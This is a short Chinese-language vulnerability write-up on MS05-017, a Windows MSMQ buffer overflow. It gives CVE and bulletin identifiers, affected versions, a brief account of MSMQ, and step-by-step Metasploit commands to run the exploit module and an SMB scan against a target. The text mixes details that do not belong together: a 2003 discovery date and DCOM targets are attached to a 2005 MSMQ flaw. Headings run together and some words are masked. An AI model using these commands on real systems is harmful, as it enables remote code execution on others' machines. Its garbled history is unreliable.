漏洞描述
此漏洞由lds-pl.net漏洞研究組在2003年7月16日發現,漏洞及exp在網上公開後,網上出現了大量的×××實例,利用此漏洞的蠕蟲也大量出現。漏洞編號
CVE-2005-0059
OSVDB-15458
MSB-MS05-017
BID-13112×××目標
DCOM接口的服務器端影響系統
Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows 2000 Service Pack 4
Microsoft Windows 2000 Service Pack 3
Microsoft Windows 98 Second Edition (SE)
Microsoft Windows 98漏洞原理
msmq在將輸入的字符串傳遞到緩衝區之前沒有執行正確的驗證,因此,可通過傳遞特製的msmq消息來觸發漏洞造成緩衝區溢出漏洞。漏洞可導致遠程代碼執行、本地提權。由於msmq概念解釋
1. msmq( MicroSoft Message Queuing, 微軟消息隊列)是在多個不同的應用之間實現互相通信的一種異步消息傳輸模式,互相通信的應用可以位於同一臺機器上,也可以分佈於網絡空間中的任意位置。msmq實現原理:消息的發送者將想要發送的消息發送至一個message中,然後保存至一個系統公共空間的消息隊列(Message Queuing)中,需要接受message的應用從Message Queuing中取出Message進行處理。msmq在消息傳遞時,需要藉助hostname來通信。metasploit exp可用目標
Windows 2000 ALL
Windows XP SP0-SP1 (English)metasploit利用ms05-017
利用此payload需要netbios hostname、ip、port三項內容
use exploit/windows/dcerpc/ms05_017_msmq
set hname <target hostname>
set rhost <target ip>
set rport <target port>
run -jmsf中查看hname
use scanner/smb/smb_version
set rhost <target ip>
set threads 24
run不使用metasploit情況下利用ms05-017
暫未發現,後續補充